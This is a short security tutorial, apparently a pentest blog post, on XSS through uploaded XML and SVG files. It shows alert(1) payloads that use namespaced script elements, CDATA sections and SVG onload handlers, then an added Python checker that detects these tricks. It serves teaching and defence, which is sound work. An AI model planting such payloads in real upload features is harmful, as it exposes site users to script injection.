[XSS] file-based attacks

Created on: 2019-06-24

Thanks to: @pentest_swissky, @signalchaos, @itsecurityguard, @mickeyc
Follow me on https://twitter.com/si9int to stay updated!

1. XML

JavaScript can be embedded inside an XML file; once the file has been uploaded, the payload may fire when the file is rendered.
Example

<html>
<head></head>
<body>
    <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
</body>
</html>

xmlns declares the XML namespace; something is the prefix bound to that namespace (used to avoid name conflicts with other XML fragments).
If we don't want our JavaScript payload to be treated as XML, we can use a CDATA section:

<name>
    <value><![CDATA[<script>alert(1)</script>]]></value>
</name>

CDATA stands for "Character Data" and means that the enclosed data (inside the section) may contain markup characters but must not be interpreted as XML.
A CDATA section is part of the XML document's content, while a comment is not.

2. SVG

Since .svg is an XML-based vector image format, we can also embed JavaScript into SVG files using a <script> tag, just like in HTML.
Example

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
    <polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
    <script type="text/javascript">alert(1);</script>
</svg>

<polygon> draws a closed shape from a list of points, at least three of them (here 0,0; 0,50; 50,0).
There are much shorter payloads for .svg files that contain only the JavaScript part. Example (executes when the SVG image renders):

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">

Again we can use a CDATA section to embed our payload "silently":

<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></script>
<desc> is not rendered as part of the graphic; it provides a text description of an SVG element.
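Added example, not part of the original article: a namespace-aware upload check that covers the XML tricks from section 1 (a prefixed script element bound to the XHTML namespace, script markup inside CDATA) and the SVG tricks from section 2 (a <script> element, an onload handler). It uses only Python's standard library; the sample documents are constructed here to mirror the payloads above.

```python
# Added example (not the article's own code): a namespace-aware check for
# uploaded XML/SVG files that reports the embedding tricks shown above:
# script elements under any prefix, on* event-handler attributes, and script
# markup smuggled through CDATA. Documents that are not well-formed XML are
# reported too: an XML parser rejects them, a lenient HTML renderer may not.
import re
import xml.etree.ElementTree as ET
from typing import List

TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z]")  # tag-like text inside a text node


def find_active_content(data: str) -> List[str]:
    """Return findings for an uploaded XML/SVG document; empty means clean."""
    findings: List[str] = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    for elem in root.iter():
        # ElementTree expands prefixes to {namespace}local, so a
        # something:script bound to XHTML is seen as a script element.
        local = elem.tag.rsplit("}", 1)[-1].lower()
        if local == "script":
            findings.append(f"script element {elem.tag}")
        for name, value in elem.attrib.items():
            attr = name.rsplit("}", 1)[-1].lower()
            if attr.startswith("on"):
                findings.append(f"event handler {attr}={value!r} on <{local}>")
        # CDATA sections reach the application as plain text; if that text
        # itself looks like markup, a later re-parse could turn it live.
        for text in (elem.text, elem.tail):
            if text and TAG_RE.search(text):
                findings.append(f"markup inside text of <{local}>")
    return findings


# Constructed samples mirroring the article's payloads (not real uploads).
SAMPLES = {
    "xhtml_prefix": '<html><body><x:script xmlns:x="http://www.w3.org/1999/xhtml">'
                    "alert(1)</x:script></body></html>",
    "cdata": "<name><value><![CDATA[<script>alert(1)</script>]]></value></name>",
    "svg_script": '<svg xmlns="http://www.w3.org/2000/svg"><polygon points="0,0 0,50 50,0"/>'
                  "<script>alert(1);</script></svg>",
    "svg_onload": '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">',
    "clean": '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>',
}

if __name__ == "__main__":
    for label, doc in SAMPLES.items():
        print(label, "->", find_active_content(doc) or "clean")
```

A real upload pipeline would reject any document with a non-empty result rather than try to strip the offending parts, since re-serialising partially cleaned XML is where CDATA-hidden markup tends to come back to life.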
